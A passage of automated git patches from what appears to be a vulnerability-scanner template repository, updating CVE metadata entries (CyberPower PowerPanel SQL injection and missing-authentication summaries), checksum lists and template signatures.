-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:bf2020a5f3806f30cfdb70539cfe48bfb9ee5c37 -http/technologies/wordpress/plugins/wp-rollback.yaml:58e4df8827bef6b7946da1c5492423f71af4d5cb -http/technologies/wordpress/plugins/wp-seopress.yaml:d9d312486e9ade2bd52a608f1717a106a32c69f3 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a766acfe0b60e794600e8fc579d6d40645cc4bd7 -http/technologies/wordpress/plugins/wp-smushit.yaml:eec54e553221daa930e009ccbac581183f643409 -http/technologies/wordpress/plugins/wp-statistics.yaml:a70a7d5e42f9489b2c28e1f3fc9141432a015ec2 -http/technologies/wordpress/plugins/wp-super-cache.yaml:2cd2fbb2eb374a5d6b7e7bed32c2559fcc1aa97c +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9dc236b58592595d94170dbb6003255a9396468c -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:06e4940cdfad32431120c82ed81e8eb6b4e70738 -http/technologies/wordpress/plugins/wpforms-lite.yaml:52846c4594e35751632ab2333e8e43c9c3bf9cf0 -http/technologies/wordpress/plugins/wps-hide-login.yaml:f06929bd96c5d55e73151bd97773061e8de9058c -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:6be01ef81843ddbe3db7798cd28b01d2daf1b98a +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:92a10839ee67e167753fd28582499d504dd6709b +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9482,7 +9485,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8bfe68aebe2156b61a85c01329fd11931449be3d +templates-checksum.txt:d89f24e6310a71cd39fe31d951ca3a94150ac9b4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6a7eeb5e2063068b47d154b408933b673807f2cc Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:44:48 +0000 Subject: [PATCH 160/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 3 +++ cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index cc7ccb0ea6..c3822e62b2 100644 --- a/cves.json +++ b/cves.json @@ -2537,6 +2537,9 @@ {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"} +{"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"} +{"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"} {"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 0d94438100..1302b97393 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -c95bef52b10e64bc82378636bdb96e68 +89d1dd2589d502323581be959b33de02 From f512322ba5bc2a8c949291259249053f8bf0fa17 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:45:47 +0000 Subject: [PATCH 161/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index c3822e62b2..5ad2b9fa9d 100644 --- a/cves.json +++ b/cves.json @@ -2540,6 +2540,7 @@ {"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"} {"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"} {"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"} +{"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"} {"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 1302b97393..a600afe706 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -89d1dd2589d502323581be959b33de02 +df9be3b3a1bd2d6a09caf1e6e91b079a From 6fa528659277355109b4fccd93b7c66138628851 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:45:50 +0000 Subject: [PATCH 162/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 96fbeab4d9..5346cceaee 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,9 @@ http/cves/2023/CVE-2023-1315.yaml http/cves/2023/CVE-2023-1317.yaml http/cves/2023/CVE-2023-1318.yaml http/cves/2024/CVE-2024-32735.yaml +http/cves/2024/CVE-2024-32736.yaml +http/cves/2024/CVE-2024-32737.yaml +http/cves/2024/CVE-2024-32738.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From a0787aaef1bbeffcbf8f8cefcf58ece8bc687146 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:45:59 +0000 Subject: [PATCH 163/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6924c6dfa4..3e221ee8db 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:ac0be37fc096aacc70b5e2ec849ce2fec2116012 -cves.json-checksum.txt:75f3f2af5cec95748091a741f2dca33966fca843 +cves.json:266cec9d376848a1d984f73796e31c9cd3c83019 +cves.json-checksum.txt:8d737f04ec96ab6a82c08a971eef5cef33a61260 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3760,6 +3760,7 @@ http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-32735.yaml:d363899f99a4dec9b609cbbf9e9cc7e10f1376b4 http/cves/2024/CVE-2024-32736.yaml:6d6ddae0457fcd129b2fc3ad7df24a4e39a4edf1 http/cves/2024/CVE-2024-32737.yaml:b3a7a503bd4f1a789e32b432926c1aa633e1e67a +http/cves/2024/CVE-2024-32738.yaml:714e1dc5026978b0c243a1d083f3ebd4ec864441 http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb @@ -9485,7 +9486,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d89f24e6310a71cd39fe31d951ca3a94150ac9b4 +templates-checksum.txt:34f401c9e0ee311455a14863459a6ee422be0ffe wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 54f1eba5801b2c6912221256379318482728a87b Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:46:04 +0000 Subject: [PATCH 164/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2018/CVE-2018-7192.yaml | 3 +-- http/cves/2018/CVE-2018-7193.yaml | 3 +-- http/cves/2023/CVE-2023-1318.yaml | 3 +-- http/cves/2024/CVE-2024-32735.yaml | 2 ++ http/technologies/wordpress/plugins/ad-inserter.yaml | 2 ++ http/technologies/wordpress/plugins/add-to-any.yaml | 2 ++ http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 ++ .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 2 ++ http/technologies/wordpress/plugins/akismet.yaml | 2 ++ http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-migration.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 2 ++ http/technologies/wordpress/plugins/amp.yaml | 2 ++ http/technologies/wordpress/plugins/antispam-bee.yaml | 2 ++ http/technologies/wordpress/plugins/astra-sites.yaml | 2 ++ http/technologies/wordpress/plugins/autoptimize.yaml | 2 ++ http/technologies/wordpress/plugins/backwpup.yaml | 2 ++ http/technologies/wordpress/plugins/better-search-replace.yaml | 2 ++ http/technologies/wordpress/plugins/better-wp-security.yaml | 2 ++ .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 ++ http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 ++ http/technologies/wordpress/plugins/breeze.yaml | 2 ++ http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 ++ http/technologies/wordpress/plugins/chaty.yaml | 2 ++ .../wordpress/plugins/child-theme-configurator.yaml | 2 ++ http/technologies/wordpress/plugins/classic-editor.yaml | 2 ++ http/technologies/wordpress/plugins/classic-widgets.yaml | 2 ++ .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 ++ http/technologies/wordpress/plugins/cmb2.yaml | 2 ++ http/technologies/wordpress/plugins/coblocks.yaml | 2 ++ http/technologies/wordpress/plugins/code-snippets.yaml | 2 ++ http/technologies/wordpress/plugins/coming-soon.yaml | 2 ++ http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 ++ .../wordpress/plugins/contact-form-7-honeypot.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-7.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-notice.yaml | 2 ++ http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 ++ http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 ++ .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 ++ http/technologies/wordpress/plugins/custom-css-js.yaml | 2 ++ http/technologies/wordpress/plugins/custom-fonts.yaml | 2 ++ http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 ++ http/technologies/wordpress/plugins/disable-comments.yaml | 2 ++ http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-page.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-post.yaml | 2 ++ http/technologies/wordpress/plugins/duplicator.yaml | 2 ++ .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 ++ .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 2 ++ http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/elementor.yaml | 2 ++ http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 ++ http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 ++ http/technologies/wordpress/plugins/envato-elements.yaml | 2 ++ .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 2 ++ http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 ++ http/technologies/wordpress/plugins/extendify.yaml | 2 ++ .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 ++ http/technologies/wordpress/plugins/flamingo.yaml | 2 ++ http/technologies/wordpress/plugins/fluent-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/fluentform.yaml | 2 ++ http/technologies/wordpress/plugins/font-awesome.yaml | 2 ++ .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/formidable.yaml | 2 ++ http/technologies/wordpress/plugins/forminator.yaml | 2 ++ http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 ++ .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 2 ++ .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 ++ .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 ++ .../wordpress/plugins/google-listings-and-ads.yaml | 2 ++ http/technologies/wordpress/plugins/google-site-kit.yaml | 2 ++ .../wordpress/plugins/google-sitemap-generator.yaml | 2 ++ http/technologies/wordpress/plugins/gtranslate.yaml | 2 ++ http/technologies/wordpress/plugins/gutenberg.yaml | 2 ++ .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 2 ++ .../wordpress/plugins/header-footer-code-manager.yaml | 2 ++ .../wordpress/plugins/header-footer-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/header-footer.yaml | 2 ++ http/technologies/wordpress/plugins/health-check.yaml | 2 ++ http/technologies/wordpress/plugins/hello-dolly.yaml | 2 ++ http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 ++ http/technologies/wordpress/plugins/hostinger.yaml | 2 ++ http/technologies/wordpress/plugins/image-optimization.yaml | 2 ++ http/technologies/wordpress/plugins/imagify.yaml | 2 ++ .../wordpress/plugins/insert-headers-and-footers.yaml | 2 ++ http/technologies/wordpress/plugins/instagram-feed.yaml | 2 ++ .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack.yaml | 2 ++ http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/kirki.yaml | 2 ++ http/technologies/wordpress/plugins/leadin.yaml | 2 ++ .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 ++ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 ++ http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 ++ http/technologies/wordpress/plugins/loco-translate.yaml | 2 ++ http/technologies/wordpress/plugins/loginizer.yaml | 2 ++ .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 ++ http/technologies/wordpress/plugins/mailpoet.yaml | 2 ++ http/technologies/wordpress/plugins/maintenance.yaml | 2 ++ http/technologies/wordpress/plugins/mainwp-child.yaml | 2 ++ http/technologies/wordpress/plugins/malcare-security.yaml | 2 ++ http/technologies/wordpress/plugins/megamenu.yaml | 2 ++ http/technologies/wordpress/plugins/members.yaml | 2 ++ http/technologies/wordpress/plugins/meta-box.yaml | 2 ++ http/technologies/wordpress/plugins/metform.yaml | 2 ++ http/technologies/wordpress/plugins/ml-slider.yaml | 2 ++ http/technologies/wordpress/plugins/newsletter.yaml | 2 ++ .../wordpress/plugins/nextend-facebook-connect.yaml | 2 ++ http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 ++ http/technologies/wordpress/plugins/ninja-forms.yaml | 2 ++ http/technologies/wordpress/plugins/ocean-extra.yaml | 2 ++ .../wordpress/plugins/official-facebook-pixel.yaml | 2 ++ http/technologies/wordpress/plugins/one-click-demo-import.yaml | 2 ++ http/technologies/wordpress/plugins/optinmonster.yaml | 2 ++ http/technologies/wordpress/plugins/otter-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/password-protected.yaml | 2 ++ http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 ++ .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 ++ http/technologies/wordpress/plugins/polylang.yaml | 2 ++ http/technologies/wordpress/plugins/popup-maker.yaml | 2 ++ http/technologies/wordpress/plugins/post-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/post-types-order.yaml | 2 ++ .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/pretty-link.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-captcha.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 ++ http/technologies/wordpress/plugins/redirection.yaml | 2 ++ http/technologies/wordpress/plugins/redux-framework.yaml | 2 ++ http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 ++ .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 2 ++ http/technologies/wordpress/plugins/safe-svg.yaml | 2 ++ http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 ++ http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 ++ http/technologies/wordpress/plugins/sg-security.yaml | 2 ++ http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 ++ .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 ++ .../wordpress/plugins/simple-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/simple-history.yaml | 2 ++ http/technologies/wordpress/plugins/siteguard.yaml | 2 ++ http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 ++ http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 ++ http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 ++ .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 2 ++ .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 2 ++ http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 ++ http/technologies/wordpress/plugins/svg-support.yaml | 2 ++ http/technologies/wordpress/plugins/tablepress.yaml | 2 ++ http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 ++ http/technologies/wordpress/plugins/templately.yaml | 2 ++ http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 ++ http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 ++ .../wordpress/plugins/translatepress-multilingual.yaml | 2 ++ .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 ++ .../wordpress/plugins/under-construction-page.yaml | 2 ++ http/technologies/wordpress/plugins/updraftplus.yaml | 2 ++ http/technologies/wordpress/plugins/user-role-editor.yaml | 2 ++ http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 ++ .../wordpress/plugins/webp-converter-for-media.yaml | 2 ++ http/technologies/wordpress/plugins/webp-express.yaml | 2 ++ .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 ++ .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 ++ .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 2 ++ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 ++ .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 ++ .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 ++ .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/wordfence.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 ++ http/technologies/wordpress/plugins/worker.yaml | 2 ++ http/technologies/wordpress/plugins/wp-crontrol.yaml | 2 ++ http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 ++ http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-logging.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 ++ http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 ++ http/technologies/wordpress/plugins/wp-optimize.yaml | 2 ++ http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 ++ http/technologies/wordpress/plugins/wp-reset.yaml | 2 ++ .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 ++ http/technologies/wordpress/plugins/wp-rollback.yaml | 2 ++ http/technologies/wordpress/plugins/wp-seopress.yaml | 2 ++ http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 ++ 